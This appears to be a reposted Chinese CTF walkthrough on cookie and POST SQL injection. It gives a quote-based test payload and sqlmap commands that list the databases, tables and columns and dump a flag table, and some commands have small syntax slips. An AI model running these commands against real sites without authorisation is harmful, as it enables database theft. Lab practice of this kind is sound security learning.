sqlmap的post注入


目錄

  1. sqlmap的POST注入
  2. cookie注入暴數據庫

 POST注入

1.驗證存在注入

正常數據包"cookie:user=user"修改"cookie:user=admin"后都會出現flag參數

驗證Cookie: user=admin’ and ‘1’=1’報錯,回顯沒有flag,說明這種情況就存在注入

2.復制post另存為1.txt文件

>>這里是修改cookie后進行注入的,那么要結合cookie注入來看post注入的原理,其實兩個是要聯合進行注入的,互不影響。

 

cookie注入

 所謂的POST注入是發送POST請就包進行注入,cookie注入是修改cookie信息進行偽裝身份或者說是作為一個注入點進行滲透

1.暴數據庫

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  --dbs

>>可以看到有四個數據庫

POST文件1.txt這里要寫文件位置如:/root/1.txt

cookie要寫成:--cookie="user=admin"

 --string參數,用來來指定結果為true時頁面所包含的字符,不包含這個字符的都會被判斷為false:--string=“flag”表示正確時候回顯flag這個單詞

指定數據庫類型:--dbms=mysql

暴數據庫:--dbs

2.猜表

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee --tables

 

>>猜出employee數據庫下有三個表

對特定的數據庫進行猜表:-D  數據庫名

猜表:--tables

其它的參數不變

3.表fllaagg中的列

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg --columns

猜列要指定數據庫、表:-D  數據庫   -T  數據表  

猜列:--columns

4.猜表中的字段

>sqlmap  -r  1.txt  -p - -cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg "flag" --dump

 

>>找到包含flag的字段

猜字段要指定數據庫、表、內容:-D  數據庫  -T  數據表   "內容"

猜字段:--dump

 同樣的方法可以查看其它數據庫、表的內容,注入點方法也是一樣的,這里注入點為cookie修改數據后的數據包。如果本身POST數據包存在注入直接使用post注入,可以不用加cookie注入--cookie“user=admin”類似這樣的參數。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM